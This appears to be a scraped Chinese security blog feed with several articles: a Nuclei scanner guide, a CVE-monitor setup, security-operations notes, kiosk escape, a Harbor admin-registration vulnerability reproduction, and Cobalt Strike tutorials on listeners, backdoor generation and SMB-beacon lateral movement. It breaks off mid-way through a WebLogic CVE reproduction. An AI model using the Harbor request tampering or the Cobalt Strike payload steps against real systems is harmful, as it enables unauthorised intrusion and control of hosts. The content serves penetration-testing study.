<content type="html"><![CDATA[<p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/nuclei-logo.png" alt="Nuclei"></p><p><strong>Nuclei是一款运行速度非常快且易于使用的扫描工具,它可以帮助研究人员基于模板执行可配置的目标扫描任务,并提供了大量可扩展接口以辅助使用。</strong></p><h3 id="功能介绍"><a href="#功能介绍" class="headerlink" title="功能介绍"></a>功能介绍</h3><ul><li><p>简单且模块化的代码,方便使用和开发;</p></li><li><p>运行速度快且完全可配置,使用了基于模板的引擎;</p></li><li><p>错误事件/特殊情况处理重传;</p></li><li><p>WAF处理;</p></li><li><p>智能匹配,实现零误报扫描;</p></li></ul><h3 id="工具使用"><a href="#工具使用" class="headerlink" title="工具使用"></a>工具使用</h3><p><code>nuclei -h</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211028095416287.png" alt="image-20211028095416287"></p><p><strong>上述命令将显示该工具的帮助信息,下面给出的是该工具的常用选项:</strong></p><table><thead><tr><th>选项标签</th><th><strong>描述信息</strong></th><th>使用示例</th></tr></thead><tbody><tr><td><strong>-c</strong></td><td><strong>并发请求数(默认10)</strong></td><td><strong>nuclei -c 100</strong></td></tr><tr><td><strong>-l</strong></td><td><strong>需运行模板的URL列表</strong></td><td><strong>nuclei -l url.txt</strong></td></tr><tr><td><strong>-t</strong></td><td><strong>要检测的模板种类</strong></td><td><strong>nuclei -t git-core.yaml -t cves/</strong></td></tr><tr><td><strong>-o</strong></td><td><strong>保存输出结果文件(按需使用)</strong></td><td><strong>nuclei -o output.txt</strong></td></tr><tr><td><strong>-timeout</strong></td><td><strong>超时时间(默认为5秒)</strong></td><td><strong>nuclei -timeout 5</strong></td></tr><tr><td><strong>-proxy-url</strong></td><td><strong>输入代理地址</strong></td><td><strong>nuclei -proxy-url hxxp://127.0.0.1:8080</strong></td></tr><tr><td><strong>-proxy-socks-url</strong></td><td><strong>输入socks代理地址</strong></td><td><strong>nuclei -proxy-socks-url socks5://user:pass@Your IP:1080</strong></td></tr><tr><td><strong>-random-agent</strong></td><td><strong>使用随机的UA</strong></td><td><strong>nuclei -random-agent</strong></td></tr><tr><td><strong>-H</strong></td><td><strong>自定义请求头</strong></td><td><strong>nuclei -H “x-bug-bounty:hacker”</strong></td></tr><tr><td><strong>-update-templates</strong></td><td><strong>下载或者升级模板</strong></td><td><strong>nuclei -update-templates</strong></td></tr><tr><td><strong>-stats</strong></td><td><strong>使用进度条</strong></td><td><strong>nuclei -stats</strong></td></tr><tr><td><strong>-debug</strong></td><td><strong>调试请求或者响应</strong></td><td><strong>nuclei -debug</strong></td></tr><tr><td><strong>-burp-collaborator-biid</strong></td><td><strong>使用burp-collaborator插件</strong></td><td><strong>nuclei -burp-collaborator-biid XXXX</strong></td></tr></tbody></table><h3 id="工具安装"><a href="#工具安装" class="headerlink" title="工具安装"></a>工具安装</h3><p><strong>代码安装:</strong></p><p>在该项目GitHub库中的<a href="https://github.com/projectdiscovery/nuclei/releases">Releases</a>页面中根据自己的平台选择预编译好的源代码,然后使用<code>tar</code>命令进行代码提取,将提取出的代码移动到自己的$PATH路径下。所使用的命令如下:</p><pre class="line-numbers language-none"><code class="language-none">wget https://github.com/projectdiscovery/nuclei/releases/download/v2.5.3/nuclei_2.5.3_linux_amd64.zipunzip nuclei_2.5.3_linux_amd64.zip<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>]]></content>
<categories>
<category> 安全工具库 </category>
</categories>
<tags>
<tag> Nuclei </tag>
</tags>
</entry>
<entry>
<title>GitHub-CVE与工具监控</title>
<link href="/article/92446bce.html"/>
<url>/article/92446bce.html</url>
<content type="html"><![CDATA[<h2 id="一-拉取项目"><a href="#一-拉取项目" class="headerlink" title="一 拉取项目"></a>一 拉取项目</h2><h3 id="1-1-简介:"><a href="#1-1-简介:" class="headerlink" title="1.1 简介:"></a>1.1 简介:</h3><p>监控github上新增的cve编号项目漏洞和监控github发布工具更新,推送钉钉或者server酱</p><h3 id="1-2-项目地址"><a href="#1-2-项目地址" class="headerlink" title="1.2 项目地址"></a>1.2 项目地址</h3><p><code>https://github.com/yhy0/github-cve-monitor</code></p><h3 id="1-3-拉取部署"><a href="#1-3-拉取部署" class="headerlink" title="1.3 拉取部署"></a>1.3 拉取部署</h3><p><code>https://github.com/yhy0/github-cve-monitor.git</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211027200514536.png" alt="image-20211027200514536"></p><p>安装必备库:<code>pip3 install -r requirements.txt</code></p><h3 id="1-4-配置推送"><a href="#1-4-配置推送" class="headerlink" title="1.4 配置推送"></a>1.4 配置推送</h3><p><strong>钉钉机器人:</strong>新建一个群–>群设置–>智能群助手(机器人管理)–>添加机器人–>选择”自定义 通过Webhook接入自定义服务”</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211027201714294.png" alt="image-20211027201714294"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211027201924581.png" alt="image-20211027201924581"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211027202023135.png" alt="image-20211027202023135"></p><p>配置config.yaml:</p><p><strong>enable: 0为关闭、enable: 1为开启。</strong>这里我开启的是飞书,假若你要开启其他的 就关闭飞书这个。以免麻烦</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211027202452504.png" alt="image-20211027202452504"></p><h3 id="1-5-gihtub-token-获取"><a href="#1-5-gihtub-token-获取" class="headerlink" title="1.5 gihtub token 获取"></a>1.5 gihtub token 获取</h3><p>对于未经身份验证的请求,github 速率限制允许每小时最多 60 个请求</p><p>而通过使用基本身份验证的 API 请求,每小时最多可以发出 5,000 个请求</p><p><a href="https://github.com/settings/tokens/new">https://github.com/settings/tokens/new</a> 创建token,时间的话选无限制的,毕竟要一直跑</p><p><img src="https://github.com/yhy0/github-cve-monitor/raw/master/images/image-20210729172507519.png" alt="image-20210729172507519"></p><h3 id="1-6-运行测试"><a href="#1-6-运行测试" class="headerlink" title="1.6 运行测试"></a>1.6 运行测试</h3><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211027202829263.png" alt="image-20211027202829263"></p><p>后台运行:</p><p><code>screen python github_cve_monitor.py</code></p><p><code>screen -ls</code> 查看正则运行的 screen</p><pre class="line-numbers language-none"><code class="language-none">screen -r github_cve#连接github_cve后台screen,如果存在的话<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><h3 id="1-7-效果展示"><a href="#1-7-效果展示" class="headerlink" title="1.7 效果展示"></a>1.7 效果展示</h3><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211028121337881.png" alt="image-20211028121337881"></p>]]></content>
<categories>
<category> 威胁情报 </category>
</categories>
<tags>
<tag> 威胁情报 </tag>
</tags>
</entry>
<entry>
<title>理解安全运营</title>
<link href="/article/f8cfd5f1.html"/>
<url>/article/f8cfd5f1.html</url>
<content type="html"><![CDATA[<h2 id="0x0-安全运营的理解"><a href="#0x0-安全运营的理解" class="headerlink" title="0x0 安全运营的理解"></a>0x0 安全运营的理解</h2><h3 id="0-1-岗位理解"><a href="#0-1-岗位理解" class="headerlink" title="0.1 岗位理解"></a>0.1 岗位理解</h3><p><strong>比较安全运维与安全运营</strong></p><p><code>运维</code>:运维简而言之就是保障信息系统的正常运转。</p><p><code>安全运维</code> = 安全 + 运维</p><p><code>运营</code>:运营要<strong>持续的输出价值</strong>。</p><p><code>安全运营</code> = <code>安全</code> + <code>运营</code> = 通过已有的安全系统、工具来生产有价值的安全信息,把它用于解决安全风险,从而实现安全的最终目标。</p><h3 id="0-2-安全运营做什么?"><a href="#0-2-安全运营做什么?" class="headerlink" title="0.2 安全运营做什么?"></a>0.2 安全运营做什么?</h3><p><strong>领导的五大致命问题</strong></p><ul><li>什么人在攻击我们?</li><li>那些资产正在遭受攻击?</li><li>对比上周攻击有什么趋势?</li><li>主要攻击手法有那些?</li><li>我们最大的风险点在哪里?</li></ul><p>安全运营的日常就是对<strong>海量告警去粗取精的“萃取”</strong>的过程。</p><h4 id="如何萃取安全数据"><a href="#如何萃取安全数据" class="headerlink" title="如何萃取安全数据"></a>如何萃取安全数据</h4><p><code>Event-Alert-Threat-Incident</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185509.png" alt="img"></p><h4 id="从Event到Incident处理流程"><a href="#从Event到Incident处理流程" class="headerlink" title="从Event到Incident处理流程"></a>从Event到Incident处理流程</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185521-20211020165930413.png" alt="img"></p><ul><li><p>告警生成</p><ul><li>归一化,聚类分析</li><li>规则特征</li><li>算法模型</li><li>威胁情报</li></ul></li><li><p>威胁生成</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185531-20211020170019988.png" alt="img"></p><ul><li>合并压缩</li><li>丰富化</li><li>误报筛选</li><li>置信度(置信区间展现的是这个参数的真实值有一定概率落在测量结果的周围的程度)</li></ul></li><li><p>威胁累积</p></li></ul><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185548.png" alt="img"></p><ul><li>场景汇聚</li><li>态势感知与响应业务场景</li><li>资产评分</li></ul><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185608.png" alt="img"></p><ul><li>威胁运营</li><li>安全事件</li></ul><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185635-20211020170301022-20211020170305743.png" alt="img"></p><h2 id="从安全事件分析角度"><a href="#从安全事件分析角度" class="headerlink" title="从安全事件分析角度"></a>从安全事件分析角度</h2><p>安全数据分析、安全事件分析是安全运营的一个核心模块,是一种服务、支持的能力。安全运营本身是为安全事件分析提供支撑,连接威胁狩猎(如果有的话)和应急响应中心,相当于企业安全“部队”中的指挥部。 安全运营为安全事件分析提供支撑,是整体网络安全保障。包括:</p><ul><li>网络安全规划</li><li>资产梳理</li><li>安全设备管理</li><li>渗透测试</li><li>漏洞扫描</li><li>威胁监控</li><li>安全事件分析</li><li>应急响应</li><li>风险评估等过程、服务</li></ul><p>覆盖到网络安全的各项工作,但是每一项服务又不是单独存在的个体,而是相互关联、重叠、交互,形成网络安全生态体系。[1] 简单来说,安全运营是企业安全的中枢,负责许多事务的处理,但不是每个方面都直接执行。比如上述讲到的应急响应、漏洞扫描、渗透测试,可能归属于事件响应部门(Incident Response),风险评估和处置可能归属于风控部门(Risk Management)等。 </p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/20200321185726-20211020170347185.png" alt="img"> </p><p>参考:<a href="https://wiki.y1ng.org/0x0_%E7%90%86%E8%A7%A3/0x3_%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5%E7%9A%84%E8%A6%81%E7%B4%A0/">https://wiki.y1ng.org/0x0_%E7%90%86%E8%A7%A3/0x3_%E5%AE%89%E5%85%A8%E8%BF%90%E8%90%A5%E7%9A%84%E8%A6%81%E7%B4%A0/</a></p>]]></content>
<categories>
<category> 安全运营 </category>
</categories>
<tags>
<tag> 安全运营 </tag>
</tags>
</entry>
<entry>
<title>自助终端逃逸</title>
<link href="/article/6cd3cbcb.html"/>
<url>/article/6cd3cbcb.html</url>
<content type="html"><![CDATA[<h3 id="1-自助终端"><a href="#1-自助终端" class="headerlink" title="1/自助终端"></a>1/自助终端</h3><p> 随着经济的发展,自动售货机已经出现在大街小巷;在机场、车站等交通系统自助购票、取票也已普及;医院、银行、政务大厅等机构也都遍布着不同的自助终端设备,大大方便了人们的生活水平,提高了办事效率。对于自助终端设备的安全问题,目前关注点却较少。</p><h4 id="1-1-基本介绍"><a href="#1-1-基本介绍" class="headerlink" title="1.1 基本介绍"></a>1.1 基本介绍</h4><p>自助终端设备是将触控屏和相关系统软件进行结合,再配以相关功能与服务的一种电子终端设备。由用户根据设备提示进行操作,辅以网络,结合手机终端或设备传感器组件完成整个功能服务流程。</p><p><img src="http://www.4001108775.net/uploads/allimg/200508/1-20050P93602449.jpg"></p><p>设备目前已广泛应用于通讯、金融、政府、交通、医疗、工商、税务等行业。若是按照功能分类基本可以分为:</p><ul><li>自助充值终端</li><li>自助缴费终端</li><li>自助售货终端</li><li>自助发卡终端</li><li>自助售取票终端</li><li>自助打印终端</li><li>自助查询终端</li></ul><h4 id="1-2-操作系统"><a href="#1-2-操作系统" class="headerlink" title="1.2 操作系统"></a>1.2 操作系统</h4><p>目前,自助终端设备常用的操作系统为Windows和Android这两种,也有少数的Linux系统。</p><p>根据提供的功能服务采用不同的操作系统,比如常见的一些自动售货机、贩卖机大都使用Android系统,系统之上安装服务应用APK。然后通过禁用和隐藏Android导航栏和通知菜单的手段防止用户跳出应用。</p><p><strong>对于一些售取票终端、政务系统等大多数使用的是Windows系统,服务应用通常采用将程序窗口最大化并且始终置顶的方式进行运行,同时隐藏系统桌面和状态栏,使用户只能在当前应用下操作。</strong></p><h4 id="1-3-网络通信"><a href="#1-3-网络通信" class="headerlink" title="1.3 网络通信"></a>1.3 网络通信</h4><p>对于自助终端设备来说,网络通信的实现有三种方式:</p><ul><li>3G/4G移动网络(企业内部物联网私有卡)</li><li>WiFi无线网络(大多办公网络)</li><li>有线以太网(接入内网)</li></ul><p>对于一些特定场所、具体实施、具有布线规划要求的自助终端设备,比如机场车站的售取票机、政府医院银行的自助设备,一般都是使用网线进行连接,也不排除会有无线网络接入的情况。其网络连接情况一般为内网地址。</p><h4 id="1-4-逃逸思路"><a href="#1-4-逃逸思路" class="headerlink" title="1.4 逃逸思路"></a>1.4 逃逸思路</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012155502344.png" alt="image-20211012155502344"></p><h4 id="社死案例"><a href="#社死案例" class="headerlink" title="社死案例"></a>社死案例</h4><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029222911913.png" alt="image-20211029222911913"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012155745256.png" alt="image-20211012155745256"></p>]]></content>
<categories>
<category> 自助终端逃 </category>
</categories>
<tags>
<tag> 自助终端逃 </tag>
</tags>
</entry>
<entry>
<title>Harbor任意管理员注册漏洞</title>
<link href="/article/bf4f999f.html"/>
<url>/article/bf4f999f.html</url>
<content type="html"><![CDATA[<p><strong>1. 简介</strong></p><p> Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。</p><p> 作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全。提升用户使用Registry构建和运行环境传输镜像的效率。Harbor支持安装在多个Registry节点的镜像资源复制,镜像全部保存在私有Registry中, 确保数据和知识产权在公司内部网络中管控。另外,Harbor也提供了高级的安全特性,诸如用户管理,访问控制和活动审计等。</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012133854849.png"></p><p><strong>2.影响范围</strong></p><p><code>Harbor: 1.7.0-1.8.2</code></p><p><strong>3.复现</strong></p><p>语法搜索 </p><p><code>title="Harbor" && country=CN</code></p><p><strong>注册,然后抓包</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012133912238.png"></p><p><strong>改包,在最后数据包加上:”has_admin_role”:true</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012134504203.png"></p><p><strong>发包验证,状态是201代表成功</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012134353211.png"></p><p><strong>登录验证</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211012134625223.png"></p><h2 id="4-修复方案"><a href="#4-修复方案" class="headerlink" title="4.修复方案"></a>4.修复方案</h2><p>升级Harbor版本到 1.7.6 和 1.8.3</p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> Harbor </tag>
</tags>
</entry>
<entry>
<title>3、Cobaltstrike Beacon与菜单栏视图</title>
<link href="/article/42e57ad0.html"/>
<url>/article/42e57ad0.html</url>
<content type="html"><![CDATA[<h2 id="3-Cobaltstrike-Beacon与菜单栏、视图"><a href="#3-Cobaltstrike-Beacon与菜单栏、视图" class="headerlink" title="3.Cobaltstrike Beacon与菜单栏、视图"></a>3.Cobaltstrike Beacon与菜单栏、视图</h2><h3 id="一、Beacon详解"><a href="#一、Beacon详解" class="headerlink" title="一、Beacon详解"></a>一、Beacon详解</h3><p>右键目标interact来使用Beacon,可以用它来执行各种命令<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605853_20200820195323098_28548.png"></p><ul><li><p>在Cobalt Strike中它的心跳默认是60s(执行一个命令你需要等待60秒后返回。因为每一分钟目标主机与teamserver通信一<br>次)这是你的操作就很郁闷了。</p></li><li><p>Cobalt Strike设置3秒真男人<br><code>sleep 3</code><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605853_20200820200116977_32605.png"></p></li></ul><h3 id="二、Cobalt-Strike多种beacon"><a href="#二、Cobalt-Strike多种beacon" class="headerlink" title="二、Cobalt Strike多种beacon"></a>二、Cobalt Strike多种beacon</h3><ul><li><strong>1、http beacon和tcp beacon这两种beacon都是比较普通的,两者区别只是主机与teamserver的通信协议不同而已。</strong><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605854_20200820201848361_24834.png"> <img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605854_20200820201821895_4198.png"></li><li><strong>2、SMB beacon</strong><br>官方介绍:SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,<strong>子Beacon</strong>从<strong>父Beacon获取</strong>到任务并发送。</li><li><em>因为链接通讯的Beacons使用Windows pipe进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,可以绕一些防火墙</em>*<br>这张图很好的诠释了SMB beacon的工作流程<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605854_20200820202651724_29752.png"></li><li><strong>3、smb beacon使用</strong><br>这种beacon要求具有SMB Beacon的主机必须接受端口445上的连接. 派生一个SMB Beacon方法:<br>在Listner生成SMB Beacon>目标主机>右键> spawn as>选中对应的Listener>上线<br>或在beacon中使用命令<code>spawn SMB Beacon</code>(SMB Beacon为我的SMB Beacon listener名字)<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605854_20200820203618393_15109.png"><br>运行成功后外部可以看到∞∞这个字符,这就是派生的SMB Beacon。<br>当前是连接状态,你可以Beacon上用link <ip>命令链接他或者unlink <ip>命令断开它。<br>这种beacon在内网横向渗透中运用的很多,横向渗透这里暂时不提。<br>可以使用ipc $等将生成的SMB Beacon上传到目标主机执行,但是目标主机并不会直<br>接上线的,需要我们自己用链接命令(link <ip>)去</li><li>4、SMB Beacon使用案例<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605854_20200820205233195_8561.png"></li><li>使用psexec来登录,这里使用SMB Beacon listener、选着子Beacon<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605854_20200820205338313_20479.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605855_20200820205537939_5588.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605855_20200820205738422_11021.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605855_20200820205822871_31672.png"></li></ul>]]></content>
<categories>
<category> 内网渗透 </category>
</categories>
<tags>
<tag> CobaltStrike </tag>
</tags>
</entry>
<entry>
<title>2、Cobaltstrike Listener与Payload生成</title>
<link href="/article/b916b10c.html"/>
<url>/article/b916b10c.html</url>
<content type="html"><![CDATA[<ul><li><h2 id="2-Cobaltstrike-Listener与Payload生成"><a href="#2-Cobaltstrike-Listener与Payload生成" class="headerlink" title="2.Cobaltstrike Listener与Payload生成"></a>2.Cobaltstrike Listener与Payload生成</h2></li></ul><h3 id="一、Listener介绍"><a href="#一、Listener介绍" class="headerlink" title="一、Listener介绍"></a>一、Listener介绍</h3><ul><li>Listener(监听器):专门用于对其他对象身上发生的事件或状态改变进行监听和相应处理的对象<br>当被监视的对象发生情况时,立即采取相应的行动。</li><li>在许多的渗透测试工具中,例如empire,metasploit,cobaltstrike中都有listener的存在。<br>大家可以简单地理解为listener就是用来接收目标主机权限的模块。</li></ul><h3 id="二、Listener创建"><a href="#二、Listener创建" class="headerlink" title="二、Listener创建"></a>二、Listener创建</h3><p>创建Listener的步骤:<br>Cobaltstrike–>监听器<br>目前我是用的是Cobaltstrike4.0版本,其中内置了八个Listener</p><pre class="line-numbers language-none"><code class="language-none">1、wndows/beacon_dns/reverse_dns_txt2、windows/beacon_http/reverse_http3、windows/beacon_https/reverse_https4、windows/beacon_bind_pipe5、windows/beacon_tcp6、windows/beacon_extc27、windows/foreign/reverse_http8、windows/foreign/reverse_https<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><ul><li><strong>windows/beacon</strong>为内置监听器包括<strong>dns、http、https、smb、tcp、extc2六种方式的监听器</strong>;</li><li><strong>windows/foreign为外部监听器</strong></li></ul><p>beacon为cs内置监听器,也就是说,当我们在目标系统成功执行payload以后,会弹回一个beacon的shell给cs。<br>foreign主要是提供给外部使用的一些监听器,比如你想利用cs派生一个meterpreter,至于如何实现Cobaltstrike与MSF和Armitage的联动,<br>我们日后再讲。<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605831_20200820171004832_18852.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605831_20200820171032405_13712.png"></p><h3 id="三、Cobaltstrike生成后门"><a href="#三、Cobaltstrike生成后门" class="headerlink" title="三、Cobaltstrike生成后门"></a>三、Cobaltstrike生成后门</h3><ul><li><p><strong>位置::攻击–>生成后门(标红为常用)</strong><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605831_20200820172003278_28687.png"></p></li><li><p><strong>生成powshell木马进行上线(其他类型payload自行学习使用)</strong><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605831_20200820172751877_18796.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605832_20200820172843581_20646.png"></p></li><li><p><strong>在目标主机命令行或powshell运行</strong><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605832_20200820173046615_25292.png"></p></li><li><p><strong>主机上线….</strong></p></li></ul><h2 id=""><a href="#" class="headerlink" title=""></a><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605832_20200820173118299_27983.png"></h2>]]></content>
<categories>
<category> 内网渗透 </category>
</categories>
<tags>
<tag> CobaltStrike </tag>
</tags>
</entry>
<entry>
<title>1、Cobaltstrike 安装与简介</title>
<link href="/article/a8d93643.html"/>
<url>/article/a8d93643.html</url>
<content type="html"><![CDATA[<h2 id="1-Cobaltstrike-安装与简介"><a href="#1-Cobaltstrike-安装与简介" class="headerlink" title="1.Cobaltstrike 安装与简介"></a>1.Cobaltstrike 安装与简介</h2><h3 id="一、简介"><a href="#一、简介" class="headerlink" title="一、简介"></a>一、简介</h3><pre class="line-numbers language-none"><code class="language-none">Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人内称为CS.自去年起,Cobaltstrike升级到3.0版本,脱离了MSF框架后在国内安全圈大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socks代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具,因此广受黑客喜爱。目前已是4.1版本项目官网:https://www.cobaltstrike.com<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><h3 id="二、cobaltstike的架构"><a href="#二、cobaltstike的架构" class="headerlink" title="二、cobaltstike的架构"></a>二、cobaltstike的架构</h3><p>本人使用的是Cabaltstrike4.0版本,虽然官方已经更新到4.1版本,但是最近都在说有后门、因此不推荐使用<br>3.13版本文件架构如下。</p><p>│ Scripts 用户安装的插件<br>│ Log 每天的日志<br>│ c2lint 检查profile的错误异常<br>│ cobaltstrike<br>│ cobaltstrike.jar 客户端程序<br>│ icon.jpg LOGO<br>│ license.pdf 许可证文件<br>│ readme.txt<br>│ releasenotes.txt<br>│ teamserver 服务端程序<br>│ update<br>│ update.jar 更新程序<br>└─third-party 第三方工具,里面放的vnc d</p><h3 id="三、Cobaltstrike安装"><a href="#三、Cobaltstrike安装" class="headerlink" title="三、Cobaltstrike安装"></a>三、Cobaltstrike安装</h3><ul><li>1、Linux环境配置示例(需提前安装好Java与JDK):推荐使用ubantu16.4<pre class="line-numbers language-none"><code class="language-none">安装java jdk:sudo apt-get update #更新软件包列表sudo apt-get install openjdk-8-jdk #安装openjdk-8-jdkjava -version #查看java版本apt-get install screen #screen后台运行<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605839_20200820153105091_21017.png"></li><li>2、上传Cobaltstrike程序至服务器</li></ul><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605840_20200820153633259_478.png"></p><ul><li>3、服务端搭建</li></ul><pre class="line-numbers language-none"><code class="language-none">cd cobaltstrike4.0 #进入cobaltstrike4.0目录ls #查看目录下文件chmod + 777 teamserver #将团队服务权限调制最高,或者执行权限。(这里是我懒直接777最高)vim teamserver #进入进行修改端口以及指纹信息、更改cs的默认ssl证书信息也很重要不然凉犊子。防止0day,改了最好<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605840_20200820160335579_23479.png"></p><ul><li>4、运行</li></ul><pre class="line-numbers language-none"><code class="language-none">screen ./teamserver ip 密码 #第一种在linux在后台运行nohup ./teamserver ip 密码 #第二种在linux在后台运行 推荐<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605840_20200820160416500_31271.png"><br>windows运行start.bat即可<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605840_20200820160606921_6852.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605840_20200820160529056_1736.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607605840_20200820160634813_7205.png"><br>工具地址:<a href="https://pan.baidu.com/s/1BA61luBY6mktNf7DFzzMhg">https://pan.baidu.com/s/1BA61luBY6mktNf7DFzzMhg</a> 提取码:qwer</p>]]></content>
<categories>
<category> 内网渗透 </category>
</categories>
<tags>
<tag> CobaltStrike </tag>
</tags>
</entry>
<entry>
<title>CVE-2020【14750,14882,14883】weblogic未授权命令执行复现</title>
<link href="/article/a1981ad3.html"/>
<url>/article/a1981ad3.html</url>
<content type="html"><![CDATA[<h3 id="简述"><a href="#简述" class="headerlink" title="简述"></a>简述</h3><p>WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。</p><h3 id="漏洞概述"><a href="#漏洞概述" class="headerlink" title="漏洞概述"></a>漏洞概述</h3><p>未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。</p><h3 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h3><pre class="line-numbers language-none"><code class="language-none">Oracle Weblogic Server 10.3.6.0.0Oracle Weblogic Server 12.1.3.0.0Oracle Weblogic Server 12.2.1.3.0Oracle Weblogic Server 12.2.1.4.0Oracle Weblogic Server 14.1.1.0.0<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre><h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><p>本次测试版本WebLogic12.2.1.4<br>下载地址:<br><code>https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html</code><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607251_20201030221957753_18260.png"><br>Java版本:<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607251_20201030224810393_9486.png"><br>需要用管理员权限运行<br><code>java -jar fmw_12.2.1.4.0_wls_lite_generic.jar</code><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607252_20201030230430097_15519.png"><br>默认下一步,选择含示列的完整安装<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607252_20201030230552878_22117.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607252_20201030231039244_20374.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607253_20201030231512877_6310.png"><br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607253_20201030231528165_18174.png"><br>访问<br><code>http://Your ip:7001/console</code><br>出现登录页面即成功安装<br><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607607253_20201030231706187_26897.png"></p><h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><h4 id="CVE-2020-14750-权限绕过漏洞"><a href="#CVE-2020-14750-权限绕过漏洞" class="headerlink" title="CVE-2020-14750: 权限绕过漏洞"></a>CVE-2020-14750: 权限绕过漏洞</h4><p>远程攻击者可以构造特殊的 HTTP 